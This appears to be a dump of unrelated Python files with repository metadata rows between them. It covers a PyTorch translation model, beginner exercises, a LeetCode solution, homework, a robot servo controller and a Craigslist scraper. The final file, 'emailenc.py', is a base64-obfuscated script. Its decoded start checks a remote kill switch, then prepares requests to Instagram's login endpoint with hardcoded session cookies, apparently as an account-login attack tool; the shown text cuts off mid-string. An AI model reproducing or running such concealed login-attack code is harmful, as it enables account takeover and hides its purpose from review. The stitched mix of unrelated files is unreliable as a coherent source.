self._cached_p_attn.append(p_attn.cpu().detach().numpy())
prediction_vector = torch.cat((context_vectors, h_t), dim=1)
score_for_y_t_index = self.classifier(F.dropout(prediction_vector, 0.3)) # (bs, 4911)
if use_sample:
p_y_t_index = F.softmax(score_for_y_t_index * self._sampling_temperature, dim=1)
y_t_index = torch.multinomial(p_y_t_index, 1).squeeze()
output_vectors.append(score_for_y_t_index)
# (25, 5, 4911)
output_vectors = torch.stack(output_vectors).permute(1, 0, 2) # (bs, 25, 4911)
return output_vectors
class NMTModel(nn.Module):
def __init__(self, source_vocab_size, source_embedding_size,
target_vocab_size, target_embedding_size, encoding_size,
target_bos_index):
super(NMTModel, self).__init__()
self.encoder = NMTEncoder(num_embeddings=source_vocab_size,
embedding_size=source_embedding_size,
rnn_hidden_size=encoding_size)
decoding_size = encoding_size * 2
self.decoder = NMTDecoder(num_embeddings=target_vocab_size,
embedding_size=target_embedding_size,
rnn_hidden_size=decoding_size,
bos_index=target_bos_index)
def forward(self, x_source, x_source_lengths, target_sequence, sample_probability=0.5):
"""
:param x_source: (batch, vectorizer.max_source_length) (bs,25)
:param x_source_lengths: length of the sequence (bs,)
:param target_sequence: target text data tensor (bs, 25)
:return: prediction vectors at each output step
"""
# (bs, 10, 256)
# (bs, 256)
encoder_state, final_hidden_states = self.encoder(x_source, x_source_lengths)
decoded_states = self.decoder(encoder_state,
final_hidden_states,
target_sequence,
sample_probability=sample_probability,
)
return decoded_states
def normalize_sizes(y_pred, y_true):
if len(y_pred.size()) == 3:
y_pred = y_pred.contiguous().view(-1, y_pred.size(2))
if len(y_true.size()) == 2:
y_true = y_true.contiguous().view(-1)
return y_pred, y_true
def compute_accuracy(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
_, y_pred_indices = y_pred.max(dim=1)
correct_indices = torch.eq(y_pred_indices, y_true).float()
valid_indices = torch.ne(y_true, mask_index).float()
n_correct = (correct_indices * valid_indices).sum().item()
n_valid = valid_indices.sum().item()
return n_correct / n_valid * 100
def sequence_loss(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)
if __name__ == '__main__':
args = Namespace(
dataset_csv="simplest_eng_fra.csv",
vectorizer_file="vectorizer.json",
learning_rate=5e-4,
batch_size=5,
source_embedding_size=64,
target_embedding_size=64,
encoding_size=128,
device='cpu',
)
dataset = NMTDataset.load_dataset_and_make_vectorizer(args.dataset_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
mask_index = vectorizer.target_vocab.mask_index
dataset.set_split('train')
batch_generator = generate_nmt_batches(dataset,
batch_size=args.batch_size,
device=args.device)
model = NMTModel(
source_vocab_size=len(vectorizer.source_vocab),
source_embedding_size=args.source_embedding_size,
target_vocab_size=len(vectorizer.target_vocab),
target_embedding_size=args.target_embedding_size,
encoding_size=args.encoding_size,
target_bos_index=vectorizer.target_vocab.begin_seq_index
)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
for batch_idx, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
y_pred = model(batch_dict['x_source'],
batch_dict['x_source_length'],
batch_dict['x_target'],
sample_probability=0.5,
)
loss = sequence_loss(y_pred, batch_dict['y_target'], mask_index)
loss.backward()
optimizer.step()
print(loss.item())
| [
"[email protected]"
] | |
c4479c6eb8c2b3de6a56bf651e278fa061e0a46d | 9be1ab6f7cc9e1e8474b7c76ef89284b54782c46 | /chapter_remaining/3_importing.py | 74ab8e113a71fbe0f3835725cf596ca9ef7ba6e6 | [] | no_license | Nateque123/python_tutorials | 8d9842d46570e6cecd7aa5419b9f77bc4468d391 | 83743acf4862155c5837c154d0422f74d0629043 | refs/heads/master | 2022-11-20T11:39:02.565456 | 2020-07-24T11:08:34 | 2020-07-24T11:08:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # simple importing practice # check file2 also
import file2
print(file2.func('nateq'))
from file2 import a
print(a) | [
"[email protected]"
] | |
70deb99eb2fe58fe8366b806aeff04fe4948a09f | 86019cfe5500aa3bd93c6cf393d6de197ff824ef | /Sai_Vinay.py | d7ac0dd4e0e205ff28f7ab792672dd6e19c8c491 | [] | no_license | rohithavarada/Member-Submissions | 8039de18ca8e1ae5fb3800935c6c6beca504154f | 9784d76654eb6192c36dd89035c4d9a629e1d27b | refs/heads/master | 2020-03-27T16:10:25.438340 | 2018-08-30T14:54:53 | 2018-08-30T14:54:53 | 146,763,830 | 0 | 0 | null | 2018-08-30T14:42:16 | 2018-08-30T14:42:16 | null | UTF-8 | Python | false | false | 89 | py | # This is for testing
printf("Hello World");
import string
print(string.ascii_lowercase)
| [
"[email protected]"
] | |
8f0ea1ddcb842afbdfefab10bdc1a50be19625f3 | a140b45f9f16b74353d15ed573ea765b3fef046d | /algorithms/leet.0693.src.1.py | 04b92c007caace7e60b187ff08050dfd9eefba49 | [] | no_license | fish-ball/leetcode | 258d4b37f05560d914bcd29f7c54820deeadb33f | 3dfd8f73c65d43cc2766c20700a619141acb927b | refs/heads/master | 2023-05-28T18:32:43.638675 | 2023-05-20T04:25:23 | 2023-05-20T04:25:23 | 31,968,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | class Solution:
def hasAlternatingBits(self, n: int) -> bool:
if n <= 2:
return True
if n & 3 in (3, 0):
return False
return self.hasAlternatingBits(n>>1)
| [
"[email protected]"
] | |
7c2820d6f5a8d4bf54d25dcbf7735c173f8122c3 | e303bf4fb1d1c6ba482788a142ce3f3f5ced9702 | /python_5_lesson_hw.py | 4aeb536f640a8ff6c3b54d8dc601096e06b21f0f | [] | no_license | isthatjoke/projects | 0d109c7f25aefb1c8e0c9d513807510ea51f5b8c | fa51cec43d6fd7b39ae9dbf4e40eca1033770782 | refs/heads/master | 2021-01-05T23:15:27.650953 | 2020-12-01T16:12:00 | 2020-12-01T16:12:00 | 241,164,290 | 1 | 0 | null | 2020-12-01T16:12:01 | 2020-02-17T17:12:37 | Python | UTF-8 | Python | false | false | 6,927 | py | # 1. Создать программно файл в текстовом формате, записать в него построчно данные,
# вводимые пользователем. Об окончании ввода данных свидетельствует пустая строка.
while True:
user_input = input("enter your text ")
if user_input == "":
break
my_file = open("new_file.txt", "a", encoding="utf-8")
my_file.writelines(user_input + "\n")
my_file.close()
# 2. Создать текстовый файл (не программно), сохранить в нем несколько строк, выполнить
# подсчет количества строк, количества слов в каждой строке.
i = 1
with open("new_file.txt", encoding="utf-8") as my_file:
content = my_file.readlines()
print("количество строк в файле ", len(content))
for el in content:
my_el = el.split(" ")
my_str = len(my_el)
print(f'количество символов в {i} строке - {my_str}')
i += 1
# 3. Создать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.
# Определить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.
# Выполнить подсчет средней величины дохода сотрудников.
with open("new_file.txt", "r", encoding="utf-8") as my_file:
my_f = list(my_file)
employee_list = []
for line in my_f:
s = line.rstrip().split(" ")
if s[1].isdigit and float(s[1]) < 20000:
employee_list.append(s[0])
print(employee_list)
# 4. Создать (не программно) текстовый файл со следующим содержимым:
# One — 1
# Two — 2
# Three — 3
# Four — 4
# Необходимо написать программу, открывающую файл на чтение и считывающую построчно данные.
# При этом английские числительные должны заменяться на русские.
# Новый блок строк должен записываться в новый текстовый файл.
lib = {'One': 'Один',
'Two': 'Два',
'Three': 'Три',
'Four': 'Четыре',
}
with open("new.txt", encoding="utf-8") as file:
my_f = list(file)
my_file = []
for line in my_f:
tmp1 = lib.get(line[:(line.find(" "))])
with open("last.txt", "a", encoding="utf-8") as new_file:
new_file.write(line.replace(line[:(line.find(" "))], tmp1))
# 5. Создать (программно) текстовый файл, записать в него программно набор чисел, разделенных пробелами.
# Программа должна подсчитывать сумму чисел в файле и выводить ее на экран.
user_input = input("введите цифры через пробел ")
if user_input.isalpha() or user_input.isspace():
print("Неверный ввод")
else:
with open("file.txt", "w") as file:
file.write(user_input)
with open("file.txt") as file:
temp = (file.read()).split(" ")
total_sum = 0
for el in temp:
total_sum = total_sum + int(el)
print(total_sum)
# 6. Необходимо создать (не программно) текстовый файл, где каждая строка описывает учебный предмет и наличие
# лекционных, практических и лабораторных занятий по этому предмету и их количество. Важно, чтобы для каждого предмета
# не обязательно были все типы занятий. Сформировать словарь, содержащий название предмета и общее количество занятий
# по нему. Вывести словарь на экран.
# Примеры строк файла:
# Информатика: 100(л) 50(пр) 20(лаб).
# Физика: 30(л) — 10(лаб)
# Физкультура: — 30(пр) —
#
# Пример словаря:
# {“Информатика”: 170, “Физика”: 40, “Физкультура”: 30}
import re
my_list = []
my_dict = {}
with open("file.txt", encoding="utf-8") as file:
for line in file:
my_list.append(line.rstrip())
for line in my_list:
fnd = line.find(":")
dlt = line[:fnd]
dig = map(int, re.findall('\d+', line))
my_dict.update({dlt: sum(dig)})
print(my_dict)
# 7. Создать (не программно) текстовый файл, в котором каждая строка должна содержать данные о фирме:
# название, форма собственности, выручка, издержки.
# Пример строки файла: firm_1 ООО 10000 5000.
# Необходимо построчно прочитать файл, вычислить прибыль каждой компании, а также среднюю прибыль.
# Если фирма получила убытки, в расчет средней прибыли ее не включать.
# Далее реализовать список. Он должен содержать словарь с фирмами и их прибылями, а также словарь со средней прибылью.
# Если фирма получила убытки, также добавить ее в словарь (со значением убытков).
# Пример списка: [{“firm_1”: 5000, “firm_2”: 3000, “firm_3”: 1000}, {“average_profit”: 2000}].
# Итоговый список сохранить в виде json-объекта в соответствующий файл.
# Пример json-объекта:
# [{"firm_1": 5000, "firm_2": 3000, "firm_3": 1000}, {"average_profit": 2000}]
#
# Подсказка: использовать менеджеры контекста.
import json
firms = {}
ave = []
ave_profit = {}
full_list = [firms, ave_profit]
with open("my_file.txt", encoding="utf-8") as file:
for line in file:
tmp = line[:(line.find(" "))]
a = (line.rstrip()).split(" ")
if int(a[2]) > int(a[3]):
tmp2 = int(a[2]) - int(a[3])
firms.update({tmp: tmp2})
ave.append(tmp2)
ave_profit.update({"average_profit": (sum(ave))})
with open("my_file.json", "w", encoding="utf-8") as j_file:
json.dump(full_list, j_file)
| [
"[email protected]"
] | |
ad8780f4445385ddc1e4194084b8981b92085a96 | fc557b9e46ee32e08860c58b29139ea377d62a16 | /robot_controller.py | a3529bb9dbc39c2451c4cb6e3ec4d18305d7407e | [] | no_license | CharmFlex-98/Quadruped_robot | 91e3fdb837b44377640c99d4883759530d9437cd | ebe56e83a8a07b4a74f84e4f95e3fe852be9114e | refs/heads/main | 2023-07-08T23:15:22.685269 | 2021-08-20T02:48:22 | 2021-08-20T02:48:22 | 398,134,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,643 | py | from __future__ import division
import time
import Adafruit_PCA9685
import pygame
import numpy as np
from inverse_kinematics import *
from math import *
class robot:
def __init__(self, width=640, height=480):
self.pwm = Adafruit_PCA9685.PCA9685()
self.pwm.set_pwm_freq(60)
self.direction={15:-1, 14:1, 13:-1, 12:1, 11:1, 10:-1, 9:1, 8:-1}
self.origin=[84, 49, 74, 63, 99, 117, 114, 124] # from 8 to 15, real servo degree!
self.stand_up=[58, 104, 50, 112, 123, 67, 136, 74]
self.thigh_calibration=[49, 63, 117, 124] # 9, 11, 13, 15
self.servo_arm_calibration=[43, 33, 140, 155] # 8, 10, 12, 14
self.calibration={8:43, 9:49, 10:33, 11:63, 12:140, 13:117, 14:155, 15:124} # from 8 to 15
self.servos={}
self.initial=[]
self.delta=[]
self.reset()
self.rad=0
self.y_offset=0
self.x_offset=0
self.vertical=0
self.vertical_direction=1
self.counter=0
self.status='sleep' #'normal', 'sleep', 'sit', 'forward', 'backward, reset'
def degree2pwm(self, degree):
pwm=round((degree/180)*(600-150)+150)
return pwm
def pwm2degree(self, pwm):
degree=round((pwm-150)/(600-150)*180)
return degree
def rotate_to(self, servo_index, target_degree, time_step, pov=False):
if pov:
target_degree=self.pov2servo_view(servo_index, target_degree)
for index, i in enumerate(servo_index):
self.initial.append(self.servos[i])
target_pwm=self.degree2pwm(target_degree[index])
self.delta.append((target_pwm-self.servos[i]))
for step in range(time_step):
for index, p in enumerate(servo_index):
self.servos[p]=self.initial[index]+self.delta[index]*((step+1)/time_step)
self.servos[p]=self.post_process_pwm(self.servos[p])
self.pwm.set_pwm(p, 0, round(self.servos[p]))
self.initial=[]
self.delta=[]
#print('rotate all done')
#self.check_pwm()
def rotate(self, servo_index, velocity):
for index, i in enumerate(servo_index):
self.servos[i]=self.servos[i]+velocity[index]*self.direction[i]
self.servos[i]=self.post_process_pwm(self.servos[i])
self.pwm.set_pwm(i, 0, round(self.servos[i]))
print('servo {} pwm is {}'.format(i, self.servos[i]))
def reset(self):
for index, i in enumerate(range(8, 16)):
self.servos[i]=self.degree2pwm(self.origin[index])
self.pwm.set_pwm(i, 0, self.degree2pwm(self.origin[index]))
time.sleep(0.01)
def check_pwm(self):
for i in self.servos:
print('servo {} in degree:{} pwm:{}'.format(i, self.pwm2degree(self.servos[i]), self.servos[i]))
time.sleep(1)
def post_process_pwm(self, pwm, min_pwm=150, max_pwm=600):
value=max(min(pwm, max_pwm), min_pwm)
return value
def pov2servo_view(self, servo_index, servo_pov_degree):
real_degree=servo_pov_degree
for index, i in enumerate(servo_index):
if self.direction[i]==-1:
real_degree[index]=180-servo_pov_degree[index]
print(real_degree)
return real_degree
def walk(self, radius1, radius2, velocity):
r1=radius1
r2=radius2
x1=r1*cos(self.rad)+self.x_offset
y1=r2*sin(self.rad)+self.y_offset
x2=r1*cos(self.rad+pi)+self.x_offset
y2=r2*sin(self.rad+pi)+self.y_offset
self.gait([15, 14, 9, 8], x1, y1, 1)
self.gait([13, 12, 11, 10], x2, y2, 1)
self.rad-=velocity
def walk_turn(self, radius1, radius2, velocity, turn_rate=2, direction='left'):
r1=radius1
r2=radius2
print(self.rad)
x1=r1*cos(self.rad)+self.x_offset
y1=r2*sin(self.rad)+self.y_offset
x2=r1*cos(self.rad+pi)+self.x_offset
y2=r2*sin(self.rad+pi)+self.y_offset
if direction=='right':
self.gait([15, 14], x1, y1, 1)
self.gait([9, 8], x1/turn_rate, y1, 1)
self.gait([13, 12], x2, y2, 1)
self.gait([11, 10], x2/turn_rate, y2, 1)
elif direction=='left':
self.gait([15, 14], x1/turn_rate, y1, 1)
self.gait([9, 8], x1, y1, 1)
self.gait([13, 12], x2/turn_rate, y2, 1)
self.gait([11, 10], x2/2, y2, 1)
else:
print('insert direction please!')
return
self.rad-=velocity
def up_down(self, velocity):
self.y_offset-=velocity
self.gait(range(8, 16), self.x_offset, self.y_offset, 1)
def front_back(self, velocity):
self.x_offset-=velocity
self.gait(range(8, 16), self.x_offset, self.y_offset, 1)
def turning_body(self, radius, velocity, radius_multiplier=2.5, x_multiplier=4, y_multiplier=4):
dif = radius * radius_multiplier * sin(self.rad)
x_offset = radius * x_multiplier * cos(self.rad / 2) + self.x_offset-radius*x_multiplier
y_offset = radius * y_multiplier * sin(self.rad/2) + self.y_offset
rad = math.asin(dif / 100)
x1 = (160 - dif - self.y_offset) * sin(rad) + x_offset + radius * cos(rad + pi / 2)
y1 = (160 - dif - self.y_offset) * (1 - sin(rad + pi / 2)) + y_offset + dif
x2 = (160 + dif - self.y_offset) * sin(rad) + x_offset + radius * cos(rad + pi / 2)
y2 = (160 + dif - self.y_offset) * (1 - sin(rad + pi / 2)) + y_offset - dif
self.gait([15, 14, 11, 10], x1, y1, 1)
self.gait([13, 12, 9, 8], x2, y2, 1)
self.rad += velocity
def jump(self, radius, velocity):
x=self.x_offset
self.vertical=self.vertical+velocity*self.vertical_direction
if self.vertical<=0:
self.counter+=1
self.vertical_direction*=-1
self.vertical=0
if self.vertical>=radius:
self.vertical_direction*=-1
self.vertical=radius
print(self.vertical)
y1=self.vertical*(self.counter%2)+self.y_offset
y2=self.vertical*((self.counter+1)%2)+self.y_offset
self.gait([15, 14, 9, 8], x, y1, 1)
self.gait([13, 12, 11, 10], x, y2, 1)
def body_slant(self, velocity):
self.rad+=velocity
dif=200*sin(self.rad)
dif=dif/2
front_legs_x=(160-dif-self.y_offset)*cos((pi/2)-self.rad)+self.x_offset
front_legs_y=(160-dif-self.y_offset)*(1-sin((pi/2)+self.rad))+self.y_offset+dif
hind_legs_x=(160+dif-self.y_offset)*cos((pi/2)-self.rad)+self.x_offset
hind_legs_y=(160+dif-self.y_offset)*(1-sin((pi/2)+self.rad))+self.y_offset-dif
self.gait([15, 14, 11, 10], front_legs_x, front_legs_y, 1)
self.gait([13, 12, 9, 8], hind_legs_x, hind_legs_y, 1)
def stand_reset(self, time_step, x=-22, y=-16):
self.y_offset=y #-13
self.x_offset=x #-6
self.rad=0
self.gait(range(8, 16), self.x_offset, self.y_offset, time_step)
def gait(self, servos, dx, dy, time_step):
servo_index=[]
servo_angle=[]
thigh_angle, arm_angle=ik_solver(dx, dy)
for x in servos:
servo_index.append(x)
if x in [9, 11, 13, 15]:
servo_angle.append(thigh_angle*self.direction[x]+self.calibration[x])
else:
servo_angle.append(arm_angle*self.direction[x]+self.calibration[x])
self.rotate_to(servo_index, servo_angle, time_step, pov=False)
#my_robot.rotate_to([15, 13, 11, 9], [110, 110, 110, 110], 50)
#my_robot.check_pwm() | [
"[email protected]"
] | |
22256ba682801c86d92e53c516104a2ac18db1fd | b27b26462524984951bfbab9250abd145ecfd4c8 | /Demoing/stage_two/bloomingtonnormal/craigslist_sample/craigslist_sample/spiders/craigslist_spider.py | 9ccd525099e5b2802a2344337a1293d1d28242f0 | [] | no_license | afcarl/fastTraffickingGrab | cb813d066f1f69f359598e0b55e632dafd273c89 | 9ff274cb7c9b6c7b60d1436c209b2bfc5907267d | refs/heads/master | 2020-03-26T06:21:21.404931 | 2014-08-16T12:38:29 | 2014-08-16T12:38:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,042 | py |
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from craigslist_sample.items import CraigslistSampleItem
class CraigslistSpider(CrawlSpider):
name = "craigslist"
allowed_domains = ["craigslist.org"]
start_urls = [
"http://bn.craigslist.org",
"http://bn.craigslist.org/cas/",
"http://bn.craigslist.org/cas/index100.html",
"http://bn.craigslist.org/cas/index200.html",
"http://bn.craigslist.org/cas/index300.html",
"http://bn.craigslist.org/cas/index400.html",
"http://bn.craigslist.org/cas/index500.html",
"http://bn.craigslist.org/cas/index600.html",
"http://bn.craigslist.org/cas/index700.html",
"http://bn.craigslist.org/cas/index800.html",
"http://bn.craigslist.org/cas/index900.html",
"http://bn.craigslist.org/cas/index1000.html",
"http://bn.craigslist.org/cas/index1100.html",
"http://bn.craigslist.org/cas/index1200.html",
"http://bn.craigslist.org/cas/index1300.html",
"http://bn.craigslist.org/cas/index1400.html",
"http://bn.craigslist.org/cas/index1500.html",
"http://bn.craigslist.org/cas/index1600.html",
"http://bn.craigslist.org/cas/index1700.html",
"http://bn.craigslist.org/cas/index1800.html",
"http://bn.craigslist.org/cas/index1900.html",
"http://bn.craigslist.org/cas/index2000.html",
"http://bn.craigslist.org/cas/index2100.html",
"http://bn.craigslist.org/cas/index2200.html",
"http://bn.craigslist.org/cas/index2300.html",
"http://bn.craigslist.org/cas/index2400.html",
"http://bn.craigslist.org/cas/index2500.html",
"http://bn.craigslist.org/cas/index2600.html",
"http://bn.craigslist.org/cas/index2700.html",
"http://bn.craigslist.org/cas/index2800.html",
"http://bn.craigslist.org/cas/index2900.html",
"http://bn.craigslist.org/cas/index3000.html",
"http://bn.craigslist.org/cas/index3100.html",
"http://bn.craigslist.org/cas/index3200.html",
"http://bn.craigslist.org/cas/index3300.html",
"http://bn.craigslist.org/cas/index3400.html",
"http://bn.craigslist.org/cas/index3500.html",
"http://bn.craigslist.org/cas/index3600.html",
"http://bn.craigslist.org/cas/index3700.html",
"http://bn.craigslist.org/cas/index3800.html",
"http://bn.craigslist.org/cas/index3900.html",
"http://bn.craigslist.org/cas/index4000.html",
"http://bn.craigslist.org/cas/index4100.html",
"http://bn.craigslist.org/cas/index4200.html",
"http://bn.craigslist.org/cas/index4300.html",
"http://bn.craigslist.org/cas/index4400.html",
"http://bn.craigslist.org/cas/index4500.html",
"http://bn.craigslist.org/cas/index4600.html",
"http://bn.craigslist.org/cas/index4700.html",
"http://bn.craigslist.org/cas/index4800.html",
"http://bn.craigslist.org/cas/index4900.html",
"http://bn.craigslist.org/cas/index5000.html",
"http://bn.craigslist.org/cas/index5100.html",
"http://bn.craigslist.org/cas/index5200.html",
"http://bn.craigslist.org/cas/index5300.html",
"http://bn.craigslist.org/cas/index5400.html",
"http://bn.craigslist.org/cas/index5500.html",
"http://bn.craigslist.org/cas/index5600.html",
"http://bn.craigslist.org/cas/index5700.html",
"http://bn.craigslist.org/cas/index5800.html",
"http://bn.craigslist.org/cas/index5900.html",
"http://bn.craigslist.org/cas/index6000.html",
"http://bn.craigslist.org/cas/index6100.html",
"http://bn.craigslist.org/cas/index6200.html",
"http://bn.craigslist.org/cas/index6300.html",
"http://bn.craigslist.org/cas/index6400.html",
"http://bn.craigslist.org/cas/index6500.html",
"http://bn.craigslist.org/cas/index6600.html",
"http://bn.craigslist.org/cas/index6700.html",
"http://bn.craigslist.org/cas/index6800.html",
"http://bn.craigslist.org/cas/index6900.html",
"http://bn.craigslist.org/cas/index7000.html",
"http://bn.craigslist.org/cas/index7100.html",
"http://bn.craigslist.org/cas/index7200.html",
"http://bn.craigslist.org/cas/index7300.html",
"http://bn.craigslist.org/cas/index7400.html",
"http://bn.craigslist.org/cas/index7500.html",
"http://bn.craigslist.org/cas/index7600.html",
"http://bn.craigslist.org/cas/index7700.html",
"http://bn.craigslist.org/cas/index7800.html",
"http://bn.craigslist.org/cas/index7900.html",
"http://bn.craigslist.org/cas/index8000.html",
"http://bn.craigslist.org/cas/index8100.html",
"http://bn.craigslist.org/cas/index8200.html",
"http://bn.craigslist.org/cas/index8300.html",
"http://bn.craigslist.org/cas/index8400.html",
"http://bn.craigslist.org/cas/index8500.html",
"http://bn.craigslist.org/cas/index8600.html",
"http://bn.craigslist.org/cas/index8700.html",
"http://bn.craigslist.org/cas/index8800.html",
"http://bn.craigslist.org/cas/index8900.html",
"http://bn.craigslist.org/cas/index9000.html",
"http://bn.craigslist.org/cas/index9100.html",
"http://bn.craigslist.org/cas/index9200.html",
"http://bn.craigslist.org/cas/index9300.html",
"http://bn.craigslist.org/cas/index9400.html",
"http://bn.craigslist.org/cas/index9500.html",
"http://bn.craigslist.org/cas/index9600.html",
"http://bn.craigslist.org/cas/index9700.html",
"http://bn.craigslist.org/cas/index9800.html",
"http://bn.craigslist.org/cas/index9900.html"
]
rules = (Rule(SgmlLinkExtractor(allow=(),restrict_xpaths=('//a')), callback="parse", follow= True),)
def parse(self, response):
hxs = HtmlXPathSelector(response)
titles = hxs.select("//span[@class='pl']")
date_info = hxs.select("//h4[@class='ban']/span[@class='bantext']/text()")
items = []
file_to = open("things.txt","a")
file_to.write(response.body)
for titles in titles:
item = CraigslistSampleItem()
item ["title"] = titles.select("a/text()").extract()
item ["link"] = titles.select("a/@href").extract()
item ["date"] = date_info.extract()
items.append(item)
return items
| [
"[email protected]"
] | |
cbefcfb03d52e7211ea14c7659e4667db51c9242 | 5b0cd5330bcb73faee8d55802f131a7e452b12c4 | /Exercise5_2_Tanit_S.py | 68c3699118abb08b3f6fa3904c097b50240a4a0f | [] | no_license | sutirangt/CP3-Tanit-Suthirangkoon | 113b1f4877f6717918163b4bb09cab4b3ee99384 | 06afdf4dbd9a36ac8a7dfa00190c162cd6fa0c1f | refs/heads/main | 2023-01-01T19:39:41.064406 | 2020-10-19T09:44:27 | 2020-10-19T09:44:27 | 303,585,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | distance = int(input("Input Distant (km):"))
time = int(input("Input Time Used (hour):"))
print(int(distance/time),"km/h") | [
"[email protected]"
] | |
5fa3c9d9bb0d62ebb1c3fba841f5fde8baeb38ba | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /tDswMNY7X9h7tyTS4_22.py | cf345fc278bf3cb0fa4a9810e75fe0ead3c22a1a | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,116 | py | """
**Mubashir** was reading about [Pascal's
triangle](https://en.wikipedia.org/wiki/Pascal's_triangle) on Wikipedia.
In mathematics, Pascal's triangle is a triangular array of the binomial
coefficients that arises in probability theory, combinatorics, and algebra.

Formula for Pascal's triangle is given by:

where `n` denotes a row of the triangle, and `k` is the position of a term in
the row.
Create a function which takes a number `n` and returns **n top rows** of
Pascal's Triangle flattened into a one-dimensional list.
### Examples
pascals_triangle(1) ➞ [1]
pascals_triangle(2) ➞ [1, 1, 1]
pascals_triangle(4) ➞ [1, 1, 1, 1, 2, 1, 1, 3, 3, 1]
### Notes
N/A
"""
import math
def pascals_triangle(n):
triangle = []
for row in range(n):
new_row = []
for k in range(row+1):
new_row.append(math.factorial(row)//(math.factorial(k)*math.factorial(row-k)))
triangle += new_row
return triangle
| [
"[email protected]"
] | |
c0f17e5920d5998d79cec7577ec22356755f532d | a476eb25d5c9d0a209c615c96615d2e5bdccdf79 | /emailenc.py | 10c8c2b8e1ce0823f78effaebea95078811e60b8 | [] | no_license | danyarcode/Safeteam | 604bc7505c9ab560defaa091a20e80fa6ab1f484 | 2fb106bd81a72753be3837a3b4da3ddec44154f2 | refs/heads/main | 2023-06-09T20:20:29.950196 | 2021-07-09T06:02:09 | 2021-07-09T06:02:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,723 | py | import base64, codecs
magic = 'aW1wb3J0IHJlcXVlc3RzCmFjdGl2ZSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly90ZXh0dXBsb2FkZXIuY29tL3RzNzFiL3JhdycpLnRleHQKaWYgJ0FuaScgaW4gYWN0aXZlOgoJcGFzcwplbHNlOgoJcHJpbnQoIlNvcnJ5IFRoaXMgVG9vbCBJcyBOb3QgV29ya2luZyBOb3cgUGxlYXMgU2VuZCBNZWFzc2FnZSBGb3IgQGFuaS5jb2RlciAoOiIpCglleGl0KCkKaW1wb3J0IG9zLHJhbmRvbQppbXBvcnQgdGltZQp1cmxfaW5zdGE9J2h0dHBzOi8vd3d3Lmluc3RhZ3JhbS5jb20vYWNjb3VudHMvbG9naW4vYWpheC8nCmhlYWRfaW5zdGE9ewogICAgICAgICAgICAnYXV0aG9yaXR5JzogJ3d3dy5pbnN0YWdyYW0uY29tJywKICAgICAgICAgICAgJ21ldGhvZCc6ICdQT1NUJywKICAgICAgICAgICAgJ3BhdGgnOiAnL2FjY291bnRzL2xvZ2luL2FqYXgvJywKICAgICAgICAgICAgJ3NjaGVtZSc6ICdodHRwcycsCiAgICAgICAgICAgICdhY2NlcHQnOiAnKi8qJywKICAgICAgICAgICAgJ2FjY2VwdC1lbmNvZGluZyc6ICdnemlwLCBkZWZsYXRlLCBicicsCiAgICAgICAgICAgICdhY2NlcHQtbGFuZ3VhZ2UnOiAnZW4tVVMsZW47cT0wLjksYXI7cT0wLjgsZW4tR0I7cT0wLjcnLAogICAgICAgICAgICAnY29udGVudC1sZW5ndGgnOiAnMjc3JywKICAgICAgICAgICAgJ2NvbnRlbnQtdHlwZSc6ICdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnLAogICAgICAgICAgICdjb29raWUnOiAnaWdfZGlkPUQ5QUQ1NUZGLUQ0MEYtNDU2OS04RjNELTcyOTIzRDZCNDk2RDsgbWlkPVgtb01Yd0FFQUFGc0dQLVZCX0tydlROanFwTVY7IGlnX25yY2I9MTsgZGF0cj1sYnp0WC1Rd0FUOXVNNnV6TERXemJnb2Y7IGZibV8xMjQwMjQ1NzQyODc0MTQ9YmFzZV9kb21haW49Lmluc3RhZ3JhbS5jb207IGRzX3VzZXJfaWQ9NDUyNDY3MjUzODU7IGNzcmZ0b2tlbj11MjdsMnNrWHhYUzNzbU55WWg3YllRN0daZUMzOXpxNScsCiAgICAgICAgICAgJ29yaWdp'
